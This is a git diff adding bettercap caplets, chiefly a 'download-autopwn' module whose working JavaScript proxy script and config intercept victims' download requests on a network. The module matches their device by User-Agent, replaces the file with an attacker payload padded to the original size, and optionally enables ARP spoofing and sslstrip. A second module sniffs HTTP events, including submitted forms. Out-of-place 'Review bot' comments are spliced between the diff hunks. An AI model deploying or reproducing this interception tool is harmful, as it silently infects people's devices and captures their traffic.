targets[t]["extensions"][e] + // Autopwn + logStr = "\n" + redLine + " Autopwning download request from " + boldRed + req.Client.IP + reset + + redLine + + redLine + " Found " + boldRed + extension.toUpperCase() + reset + " extension in " 
+ boldRed + req.Hostname + req.Path + reset + + redLine + + redLine + " Grabbing " + boldRed + targets[t]["device"].toUpperCase() + reset + " payload..." + // Check requested file size + requestedFile = res.ReadBody() + requestedFileSize = requestedFile.length + payload = readFile("/usr/local/share/bettercap/caplets/download-autopwn/" + targets[t]["device"] + "/payload." + extension) + payloadSize = payload.length + logStr += redLine + " The size of the requested file is " + boldRed + requestedFileSize + reset + " bytes" + + redLine + " The raw size of your payload is " + boldRed + payloadSize + reset + " bytes" + redLine + // Append nullbytes to payload if resizing is enabled and if requested file is larger than payload + if ( env("downloadautopwn.resizepayloads") == "true" && requestedFileSize > payloadSize ) { + logStr += redLine + " Resizing your payload to " + boldRed + requestedFileSize + reset + " bytes..." + sizeDifference = requestedFileSize - payloadSize + nullbyteString = Array(sizeDifference + 1).join(nullbyte) + payload += nullbyteString + } + // Set Content-Disposition header to enforce file download instead of in-browser preview + res.SetHeader("Content-Disposition", "attachment; filename=\"" + requestedFileName + "\"") + // Update Content-Length header in case our payload is larger than the requested file + res.SetHeader("Content-Length", payload.length) + logStr += redLine + " Serving your payload to " + boldRed + req.Client.IP + reset + "...\n" + log(logStr) + res.Body = payload + } + } + } + } + } +} +``` + +
+ +### Now you're all set to pwn! + +#### What it looks like when you have configured a crazy amount of payloads + +![screenshot 1](https://user-images.githubusercontent.com/29265684/37411166-e3796c46-27ed-11e8-94da-8e1c226a0dd3.png) + +#### What it looks like when you pwn someone's download >:-) + +![screenshot 2](https://user-images.githubusercontent.com/29265684/37409382-f6bb143e-27e9-11e8-86c5-c1c556900556.png) + +Have fun! diff --git a/download-autopwn/android/payload.apk b/download-autopwn/android/payload.apk new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/android/payload.apk differ diff --git a/download-autopwn/android/payload.jar b/download-autopwn/android/payload.jar new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/android/payload.jar differ diff --git a/download-autopwn/android/payload.mkv b/download-autopwn/android/payload.mkv new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/android/payload.mkv differ diff --git a/download-autopwn/android/payload.mp3 b/download-autopwn/android/payload.mp3 new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/android/payload.mp3 differ diff --git a/download-autopwn/android/payload.mp4 b/download-autopwn/android/payload.mp4 new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/android/payload.mp4 differ diff --git a/download-autopwn/android/payload.pdf b/download-autopwn/android/payload.pdf new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/android/payload.pdf differ diff --git a/download-autopwn/android/payload.pfx b/download-autopwn/android/payload.pfx new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/android/payload.pfx differ 
diff --git a/download-autopwn/android/payload.py b/download-autopwn/android/payload.py new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/android/payload.py differ diff --git a/download-autopwn/android/payload.sh b/download-autopwn/android/payload.sh new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/android/payload.sh differ diff --git a/download-autopwn/android/payload.tar b/download-autopwn/android/payload.tar new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/android/payload.tar differ diff --git a/download-autopwn/android/payload.tar.gz b/download-autopwn/android/payload.tar.gz new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/android/payload.tar.gz differ diff --git a/download-autopwn/android/payload.tgz b/download-autopwn/android/payload.tgz new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/android/payload.tgz differ diff --git a/download-autopwn/android/payload.zip b/download-autopwn/android/payload.zip new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/android/payload.zip differ diff --git a/download-autopwn/download-autopwn.cap b/download-autopwn/download-autopwn.cap new file mode 100644 index 0000000..0ed8217 --- /dev/null +++ b/download-autopwn/download-autopwn.cap 
@@ -0,0 +1,51 @@
+# documentation can be found at https://github.com/bettercap/blob/master/download-autopwn/README.md
+#
+# this module lets you intercept very specific download requests and replaces the payload with one of your choice
+#
+# in order for a download to get intercepted:
+# 1. the victim's user-agent string must match the downloadautopwn.useragent.x regexp value
+# 2. the requested file must match one of the downloadautopwn.extensions.x file extensions
+#
+# you can find the downloadautopwn.devices in the download-autopwn/ folder (you can add your own)
+#
+
+# choose the devices from which downloads get pwned (enter the dir names of choice from download-autopwn/)
+# (or feel free to add your own)
+set downloadautopwn.devices android,ios,linux,macos,ps4,windows,xbox
+
+# choose the regexp value that the victim's User-Agent has to match
+# (feel free to add your own)
+set downloadautopwn.useragent.android Android
+set downloadautopwn.useragent.ios iPad|iPhone|iPod
+set downloadautopwn.useragent.linux Linux
+set downloadautopwn.useragent.macos Intel Mac OS X 10_
+set downloadautopwn.useragent.ps4 PlayStation 4
+set downloadautopwn.useragent.windows Windows|WOW64
+set downloadautopwn.useragent.xbox Xbox
+
+# choose which file extensions get intercepted and replaced by your payload on specific devices (payloads are in download-autopwn/.../)
+# (again, you can add as many as you want)
+# make sure the payload files exist and that they are all named "payload" (for example: payload.exe)
+set downloadautopwn.extensions.android apk,pdf,sh,pfx,zip
+set downloadautopwn.extensions.ios ipa,ios,ipb,ipsw,ipsx,ipcc,mobileconfig,pdf,zip
+set downloadautopwn.extensions.linux c,go,sh,py,rb,cr,pl,deb,pdf,jar,zip
+set downloadautopwn.extensions.macos app,dmg,doc,docx,jar,ai,ait,psd,pdf,c,go,sh,py,rb,pl,terminal,zip
+set downloadautopwn.extensions.ps4 disc,pup,pdf,doc,docx,zip
+set downloadautopwn.extensions.windows exe,msi,bat,jar,dll,doc,docx,swf,psd,ai,ait,pdf,rar,zip
+set downloadautopwn.extensions.xbox exe,msi,jar,pdf,doc,docx,zip
+
+# choose whether the proxy module resizes your payload to the requested file's size (if not set then default=false)
+set downloadautopwn.resizepayloads true
+
+# set download-autopwn.js as proxy script
+set http.proxy.script download-autopwn.js
+# uncomment if you want sslstrip enabled
+# set http.proxy.sslstrip true
+# start proxy
+http.proxy on
+
+# wait for everything to start properly
+sleep 1
+
+# uncomment if you want arp spoofing (make sure probing is off as it conflicts with arp spoofing)
+# arp.spoof on
diff --git a/download-autopwn/download-autopwn.js b/download-autopwn/download-autopwn.js
new file mode 100644
index 0000000..20fb9d1
--- /dev/null
+++ b/download-autopwn/download-autopwn.js
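Review bot: `set downloadautopwn.extensions.macos ...` lists `go` and `pl`, but the commit adds no `download-autopwn/macos/payload.go` or `download-autopwn/macos/payload.pl` (the macos directory receives only 7z, ai, ait, app, c, dmg, doc, docx, jar, m4a, mov, mp3, mp4, pdf, psd, py, rb, sh, tar, tar.gz, terminal, tgz and zip), and download-autopwn.js calls `readFile` on that path without checking it exists, so a request matching either entry presumably errors at runtime instead of being skipped; either drop the two entries or make the list agree with the files actually shipped. The header comment's URL `https://github.com/bettercap/blob/master/download-autopwn/README.md` is also missing the `caplets` path segment that README.md itself uses (`https://github.com/bettercap/caplets/blob/master/download-autopwn/README.md`).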
@@ -0,0 +1,84 @@ +var targets = {} + +var nullbyte = "\u0000" + +var green = "\033[32m", + boldRed = "\033[1;31m", + onRed = "\033[41m", + reset = "\033[0m", + redLine = "\n " + onRed + " " + reset + +function onLoad() { + devices = env["downloadautopwn.devices"].split(",") + logStr = "" + for (var i = 0; i < devices.length; i++) { + item = { + "device": devices[i], + "useragent": env[ "downloadautopwn.useragent." + devices[i] ], + "extensions": env[ "downloadautopwn.extensions." + devices[i] ].toLowerCase().split(",") + } + targets[i] = item + logStr += "\n " + green + targets[i]["device"] + reset + + "\n User-Agent: " + targets[i]["useragent"] + + "\n Extensions: " + targets[i]["extensions"] + "\n" + } + log("Download Autopwn loaded.\n\nDownload Autopwn targets: \n" + logStr) +} + +function onResponse(req, res) { + // First of all check whether the requested path might have an extension (to save cpu) + var requestedFileName = req.Path.replace(/.*\//g, "") + if ( requestedFileName.indexOf(".") != -1 ) { + var userAgent = req.GetHeader("User-Agent", ""), + extension + // Iterate through targets + for ( var t = 0; t < Object.keys(targets).length; t++ ) { + // Check if User-Agent is a target + regex = new RegExp(targets[t]["useragent"]) + if ( userAgent.match(regex) ) { + // Iterate through target extensions + for (var e = 0; e < targets[t]["extensions"].length; e++) { + // Check if requested path contains a targeted extension + // function endsWith() could be a nice simplification here + if ( requestedFileName.replace(/.*\./g, "").toLowerCase() == targets[t]["extensions"][e] ) { + extension = targets[t]["extensions"][e] + // Autopwn + logStr = "\n" + redLine + " Autopwning download request from " + boldRed + req.Client.IP + reset + + redLine + + redLine + " Found " + boldRed + extension.toUpperCase() + reset + " extension in " + boldRed + req.Hostname + req.Path + reset + + redLine + + redLine + " Grabbing " + boldRed + targets[t]["device"].toUpperCase() + reset + " 
payload..." + // Check our payload size + payload = readFile("/usr/local/share/bettercap/caplets/download-autopwn/" + targets[t]["device"] + "/payload." + extension) + payloadSize = payload.length + logStr += redLine + " The raw size of your payload is " + boldRed + payloadSize + reset + " bytes" + // Append nullbytes to payload if resizing is enabled and if requested file is larger than payload + if ( env["downloadautopwn.resizepayloads"] == "true" ) { + // Check requested file size + requestedFileSize = parseInt(res.GetHeader("Content-Length", "0")) + if (requestedFileSize == 0) { + requestedFileSize = res.ReadBody().length + } + logStr += redLine + " The size of the requested file is " + boldRed + requestedFileSize + reset + " bytes" + // Append nullbytes if required + if (requestedFileSize > payloadSize) { + logStr += redLine + " Resizing your payload to " + boldRed + requestedFileSize + reset + " bytes..." + sizeDifference = requestedFileSize - payloadSize + nullbyteString = Array(sizeDifference + 1).join(nullbyte) + payload += nullbyteString + } + } + // Set Content-Disposition header to enforce file download instead of in-browser preview + res.SetHeader("Content-Disposition", "attachment; filename=\"" + requestedFileName + "\"") + // Update Content-Length header + res.RemoveHeader("Content-Length") + logStr += redLine + + redLine + " Serving your payload to " + boldRed + req.Client.IP + reset + "...\n" + log(logStr) + res.Body = payload + } + } + } + } + } +} diff --git a/download-autopwn/ios/payload.ios b/download-autopwn/ios/payload.ios new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/ios/payload.ios differ diff --git a/download-autopwn/ios/payload.ipa b/download-autopwn/ios/payload.ipa new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/ios/payload.ipa differ 
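Review bot: `onLoad` and `onResponse` assign `devices`, `logStr`, `item`, `regex`, `payload`, `payloadSize`, `requestedFileSize`, `sizeDifference` and `nullbyteString` without `var`, so each becomes a script-wide global that outlives the call instead of a local; declaring each at first use, e.g. `var regex = new RegExp(targets[t]["useragent"])`, keeps per-response state out of the shared scope. `parseInt(res.GetHeader("Content-Length", "0"))` should also pass the radix, `parseInt(res.GetHeader("Content-Length", "0"), 10)`. The copy of this script embedded in download-autopwn/README.md has drifted from this file (it calls `env("...")` as a function, reads `req.Headers.length`, and sets `Content-Length` to `payload.length` where this file calls `res.RemoveHeader("Content-Length")`), so the README no longer shows what ships.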
diff --git a/download-autopwn/ios/payload.ipb b/download-autopwn/ios/payload.ipb new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/ios/payload.ipb differ diff --git a/download-autopwn/ios/payload.ipcc b/download-autopwn/ios/payload.ipcc new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/ios/payload.ipcc differ diff --git a/download-autopwn/ios/payload.ipsw b/download-autopwn/ios/payload.ipsw new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/ios/payload.ipsw differ diff --git a/download-autopwn/ios/payload.ipsx b/download-autopwn/ios/payload.ipsx new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/ios/payload.ipsx differ diff --git a/download-autopwn/ios/payload.m4a b/download-autopwn/ios/payload.m4a new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/ios/payload.m4a differ diff --git a/download-autopwn/ios/payload.mkv b/download-autopwn/ios/payload.mkv new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/ios/payload.mkv differ diff --git a/download-autopwn/ios/payload.mobileconfig b/download-autopwn/ios/payload.mobileconfig new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/ios/payload.mobileconfig differ diff --git a/download-autopwn/ios/payload.mp3 b/download-autopwn/ios/payload.mp3 new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/ios/payload.mp3 differ diff --git a/download-autopwn/ios/payload.mp4 b/download-autopwn/ios/payload.mp4 new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/ios/payload.mp4 differ diff --git a/download-autopwn/ios/payload.pdf b/download-autopwn/ios/payload.pdf new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/ios/payload.pdf differ 
diff --git a/download-autopwn/ios/payload.zip b/download-autopwn/ios/payload.zip new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/ios/payload.zip differ diff --git a/download-autopwn/linux/payload.c b/download-autopwn/linux/payload.c new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/linux/payload.c differ diff --git a/download-autopwn/linux/payload.cr b/download-autopwn/linux/payload.cr new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/linux/payload.cr differ diff --git a/download-autopwn/linux/payload.deb b/download-autopwn/linux/payload.deb new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/linux/payload.deb differ diff --git a/download-autopwn/linux/payload.go b/download-autopwn/linux/payload.go new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/linux/payload.go differ diff --git a/download-autopwn/linux/payload.jar b/download-autopwn/linux/payload.jar new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/linux/payload.jar differ diff --git a/download-autopwn/linux/payload.mp3 b/download-autopwn/linux/payload.mp3 new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/linux/payload.mp3 differ diff --git a/download-autopwn/linux/payload.mp4 b/download-autopwn/linux/payload.mp4 new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/linux/payload.mp4 differ diff --git a/download-autopwn/linux/payload.pdf b/download-autopwn/linux/payload.pdf new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/linux/payload.pdf differ diff --git a/download-autopwn/linux/payload.pl b/download-autopwn/linux/payload.pl new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/linux/payload.pl differ 
diff --git a/download-autopwn/linux/payload.py b/download-autopwn/linux/payload.py new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/linux/payload.py differ diff --git a/download-autopwn/linux/payload.rb b/download-autopwn/linux/payload.rb new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/linux/payload.rb differ diff --git a/download-autopwn/linux/payload.sh b/download-autopwn/linux/payload.sh new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/linux/payload.sh differ diff --git a/download-autopwn/linux/payload.tar b/download-autopwn/linux/payload.tar new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/linux/payload.tar differ diff --git a/download-autopwn/linux/payload.tar.gz b/download-autopwn/linux/payload.tar.gz new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/linux/payload.tar.gz differ diff --git a/download-autopwn/linux/payload.tgz b/download-autopwn/linux/payload.tgz new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/linux/payload.tgz differ diff --git a/download-autopwn/linux/payload.zip b/download-autopwn/linux/payload.zip new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/linux/payload.zip differ diff --git a/download-autopwn/macos/payload.7z b/download-autopwn/macos/payload.7z new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/macos/payload.7z differ diff --git a/download-autopwn/macos/payload.ai b/download-autopwn/macos/payload.ai new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/macos/payload.ai differ diff --git a/download-autopwn/macos/payload.ait b/download-autopwn/macos/payload.ait new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/macos/payload.ait differ 
diff --git a/download-autopwn/macos/payload.app b/download-autopwn/macos/payload.app new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/macos/payload.app differ diff --git a/download-autopwn/macos/payload.c b/download-autopwn/macos/payload.c new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/macos/payload.c differ diff --git a/download-autopwn/macos/payload.dmg b/download-autopwn/macos/payload.dmg new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/macos/payload.dmg differ diff --git a/download-autopwn/macos/payload.doc b/download-autopwn/macos/payload.doc new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/macos/payload.doc differ diff --git a/download-autopwn/macos/payload.docx b/download-autopwn/macos/payload.docx new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/macos/payload.docx differ diff --git a/download-autopwn/macos/payload.jar b/download-autopwn/macos/payload.jar new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/macos/payload.jar differ diff --git a/download-autopwn/macos/payload.m4a b/download-autopwn/macos/payload.m4a new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/macos/payload.m4a differ diff --git a/download-autopwn/macos/payload.mov b/download-autopwn/macos/payload.mov new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/macos/payload.mov differ diff --git a/download-autopwn/macos/payload.mp3 b/download-autopwn/macos/payload.mp3 new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/macos/payload.mp3 differ diff --git a/download-autopwn/macos/payload.mp4 b/download-autopwn/macos/payload.mp4 new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/macos/payload.mp4 differ 
diff --git a/download-autopwn/macos/payload.pdf b/download-autopwn/macos/payload.pdf new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/macos/payload.pdf differ diff --git a/download-autopwn/macos/payload.psd b/download-autopwn/macos/payload.psd new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/macos/payload.psd differ diff --git a/download-autopwn/macos/payload.py b/download-autopwn/macos/payload.py new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/macos/payload.py differ diff --git a/download-autopwn/macos/payload.rb b/download-autopwn/macos/payload.rb new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/macos/payload.rb differ diff --git a/download-autopwn/macos/payload.sh b/download-autopwn/macos/payload.sh new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/macos/payload.sh differ diff --git a/download-autopwn/macos/payload.tar b/download-autopwn/macos/payload.tar new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/macos/payload.tar differ diff --git a/download-autopwn/macos/payload.tar.gz b/download-autopwn/macos/payload.tar.gz new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/macos/payload.tar.gz differ diff --git a/download-autopwn/macos/payload.terminal b/download-autopwn/macos/payload.terminal new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/macos/payload.terminal differ diff --git a/download-autopwn/macos/payload.tgz b/download-autopwn/macos/payload.tgz new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/macos/payload.tgz differ 
diff --git a/download-autopwn/macos/payload.zip b/download-autopwn/macos/payload.zip new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/macos/payload.zip differ diff --git a/download-autopwn/ps4/payload.aac b/download-autopwn/ps4/payload.aac new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/ps4/payload.aac differ diff --git a/download-autopwn/ps4/payload.avi b/download-autopwn/ps4/payload.avi new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/ps4/payload.avi differ diff --git a/download-autopwn/ps4/payload.disc b/download-autopwn/ps4/payload.disc new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/ps4/payload.disc differ diff --git a/download-autopwn/ps4/payload.doc b/download-autopwn/ps4/payload.doc new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/ps4/payload.doc differ diff --git a/download-autopwn/ps4/payload.docx b/download-autopwn/ps4/payload.docx new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/ps4/payload.docx differ diff --git a/download-autopwn/ps4/payload.flac b/download-autopwn/ps4/payload.flac new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/ps4/payload.flac differ diff --git a/download-autopwn/ps4/payload.m4a b/download-autopwn/ps4/payload.m4a new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/ps4/payload.m4a differ diff --git a/download-autopwn/ps4/payload.mkv b/download-autopwn/ps4/payload.mkv new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/ps4/payload.mkv differ diff --git a/download-autopwn/ps4/payload.mp3 b/download-autopwn/ps4/payload.mp3 new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/ps4/payload.mp3 differ 
diff --git a/download-autopwn/ps4/payload.mp4 b/download-autopwn/ps4/payload.mp4 new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/ps4/payload.mp4 differ diff --git a/download-autopwn/ps4/payload.pdf b/download-autopwn/ps4/payload.pdf new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/ps4/payload.pdf differ diff --git a/download-autopwn/ps4/payload.pup b/download-autopwn/ps4/payload.pup new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/ps4/payload.pup differ diff --git a/download-autopwn/ps4/payload.zip b/download-autopwn/ps4/payload.zip new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/ps4/payload.zip differ diff --git a/download-autopwn/windows/payload.7z b/download-autopwn/windows/payload.7z new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/windows/payload.7z differ diff --git a/download-autopwn/windows/payload.ai b/download-autopwn/windows/payload.ai new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/windows/payload.ai differ diff --git a/download-autopwn/windows/payload.ait b/download-autopwn/windows/payload.ait new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/windows/payload.ait differ diff --git a/download-autopwn/windows/payload.avi b/download-autopwn/windows/payload.avi new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/windows/payload.avi differ diff --git a/download-autopwn/windows/payload.bat b/download-autopwn/windows/payload.bat new file mode 100644 index 0000000..f76dd23 Binary files /dev/null and b/download-autopwn/windows/payload.bat differ 
diff --git a/download-autopwn/windows/payload.dll b/download-autopwn/windows/payload.dll
new file mode 100644
index 0000000..f76dd23
Binary files /dev/null and b/download-autopwn/windows/payload.dll differ
diff --git a/download-autopwn/windows/payload.doc b/download-autopwn/windows/payload.doc
new file mode 100644
index 0000000..f76dd23
Binary files /dev/null and b/download-autopwn/windows/payload.doc differ
diff --git a/download-autopwn/windows/payload.docx b/download-autopwn/windows/payload.docx
new file mode 100644
index 0000000..f76dd23
Binary files /dev/null and b/download-autopwn/windows/payload.docx differ
diff --git a/download-autopwn/windows/payload.exe b/download-autopwn/windows/payload.exe
new file mode 100644
index 0000000..f76dd23
Binary files /dev/null and b/download-autopwn/windows/payload.exe differ
diff --git a/download-autopwn/windows/payload.flv b/download-autopwn/windows/payload.flv
new file mode 100644
index 0000000..f76dd23
Binary files /dev/null and b/download-autopwn/windows/payload.flv differ
diff --git a/download-autopwn/windows/payload.jar b/download-autopwn/windows/payload.jar
new file mode 100644
index 0000000..f76dd23
Binary files /dev/null and b/download-autopwn/windows/payload.jar differ
diff --git a/download-autopwn/windows/payload.mp3 b/download-autopwn/windows/payload.mp3
new file mode 100644
index 0000000..f76dd23
Binary files /dev/null and b/download-autopwn/windows/payload.mp3 differ
diff --git a/download-autopwn/windows/payload.mp4 b/download-autopwn/windows/payload.mp4
new file mode 100644
index 0000000..f76dd23
Binary files /dev/null and b/download-autopwn/windows/payload.mp4 differ
diff --git a/download-autopwn/windows/payload.msi b/download-autopwn/windows/payload.msi
new file mode 100644
index 0000000..f76dd23
Binary files /dev/null and b/download-autopwn/windows/payload.msi differ
diff --git a/download-autopwn/windows/payload.pdf b/download-autopwn/windows/payload.pdf
new file mode 100644
index 0000000..f76dd23
Binary files /dev/null and b/download-autopwn/windows/payload.pdf differ
diff --git a/download-autopwn/windows/payload.psd b/download-autopwn/windows/payload.psd
new file mode 100644
index 0000000..f76dd23
Binary files /dev/null and b/download-autopwn/windows/payload.psd differ
diff --git a/download-autopwn/windows/payload.rar b/download-autopwn/windows/payload.rar
new file mode 100644
index 0000000..f76dd23
Binary files /dev/null and b/download-autopwn/windows/payload.rar differ
diff --git a/download-autopwn/windows/payload.swf b/download-autopwn/windows/payload.swf
new file mode 100644
index 0000000..f76dd23
Binary files /dev/null and b/download-autopwn/windows/payload.swf differ
diff --git a/download-autopwn/windows/payload.wav b/download-autopwn/windows/payload.wav
new file mode 100644
index 0000000..f76dd23
Binary files /dev/null and b/download-autopwn/windows/payload.wav differ
diff --git a/download-autopwn/windows/payload.zip b/download-autopwn/windows/payload.zip
new file mode 100644
index 0000000..f76dd23
Binary files /dev/null and b/download-autopwn/windows/payload.zip differ
diff --git a/download-autopwn/xbox/payload.doc b/download-autopwn/xbox/payload.doc
new file mode 100644
index 0000000..f76dd23
Binary files /dev/null and b/download-autopwn/xbox/payload.doc differ
diff --git a/download-autopwn/xbox/payload.docx b/download-autopwn/xbox/payload.docx
new file mode 100644
index 0000000..f76dd23
Binary files /dev/null and b/download-autopwn/xbox/payload.docx differ
diff --git a/download-autopwn/xbox/payload.exe b/download-autopwn/xbox/payload.exe
new file mode 100644
index 0000000..f76dd23
Binary files /dev/null and b/download-autopwn/xbox/payload.exe differ
diff --git a/download-autopwn/xbox/payload.jar b/download-autopwn/xbox/payload.jar
new file mode 100644
index 0000000..f76dd23
Binary files /dev/null and b/download-autopwn/xbox/payload.jar differ
diff --git a/download-autopwn/xbox/payload.msi b/download-autopwn/xbox/payload.msi
new file mode 100644
index 0000000..f76dd23
Binary files /dev/null and b/download-autopwn/xbox/payload.msi differ
diff --git a/download-autopwn/xbox/payload.pdf b/download-autopwn/xbox/payload.pdf
new file mode 100644
index 0000000..f76dd23
Binary files /dev/null and b/download-autopwn/xbox/payload.pdf differ
diff --git a/download-autopwn/xbox/payload.zip b/download-autopwn/xbox/payload.zip
new file mode 100644
index 0000000..f76dd23
Binary files /dev/null and b/download-autopwn/xbox/payload.zip differ
diff --git a/enumerate/events/README.md b/enumerate/events/README.md
new file mode 100644
index 0000000..93d44fe
--- /dev/null
+++ b/enumerate/events/README.md
@@ -0,0 +1,11 @@
+# enumerate.events
+
+A simple module that lets you enumerate events.
+
+Example:
+
+`enumerate.events.regexp GET|POST|HEAD|PUT|DELETE|CONNECT|OPTIONS|TRACE|PATCH|=>|Form:`
+
+(this command will print all HTTP events; regexp must be written as in `new RegExp()`)
+
+![screenshot from 2018-07-27 21-48-20](https://user-images.githubusercontent.com/29265684/43319311-97526282-91e7-11e8-854e-c209ba60b732.png)
diff --git a/enumerate/events/module.cap b/enumerate/events/module.cap
new file mode 100644
index 0000000..13136f2
--- /dev/null
+++ b/enumerate/events/module.cap
@@ -0,0 +1,13 @@
+# events.stream
+events.stream off
+set events.stream.output enumerate/events/session1.events.stream.output
+events.stream on
+
+# net.sniff
+set net.sniff.verbose false
+net.sniff on
+
+# http.proxy
+set http.proxy.script enumerate/events/module.js
+set http.proxy.port 8023
+http.proxy on
diff --git a/enumerate/events/module.js b/enumerate/events/module.js
new file mode 100644
index 0000000..cbaca23
--- /dev/null
+++ b/enumerate/events/module.js @@ -0,0 +1,36 @@ +var red = "\033[31m", + yellow = "\033[33m", + green = "\033[32m", + bold = "\033[1;37m", + reset = "\033[0m" + +function configure() { + if ( !readFile( env("events.stream.output") ) ) { + log_error("Error: " + bold + "events.stream.output" + reset + " file not found (got " + env("events.stream.output") + ")") + } +} + +function onCommand(cmd) { + if (cmd == "enumerate.events.all") { + console.log( readFile( env("events.stream.output") ) ) + return true + } + if ( cmd.match(/^enumerate\.events\.regexp ./) ) { + regexp = new RegExp( cmd.replace("enumerate.events.regexp ", "") ) + saved_events = readFile( env("events.stream.output") ).split("\n") + found_events = [] + for (var i = 0; i < saved_events.length; i++) { + saved_events[i].match(regexp) ? found_events.push(saved_events[i]) : "" + } + console.log( found_events.join("\n") ) + return true + } +} + +function onLoad() { + console.log("\n" + bold + " Commands" + reset + "\n") + console.log(" " + yellow + "enumerate.events.all" + reset + " : Enumerate all events.") + console.log(" " + yellow + "enumerate.events.regexp" + reset + " : Enumerate events with regexp value.\n") + configure() + log_info("(" + green + "enumerate.events" + reset + ") Module successfully loaded.") +} diff --git a/enumerate/hosts/README.md b/enumerate/hosts/README.md new file mode 100644 index 0000000..7cc32ab --- /dev/null +++ b/enumerate/hosts/README.md @@ -0,0 +1,7 @@ +# enumerate.hosts + +A simple module that lets you enumerate individual hosts. + +Example: + +![screenshot 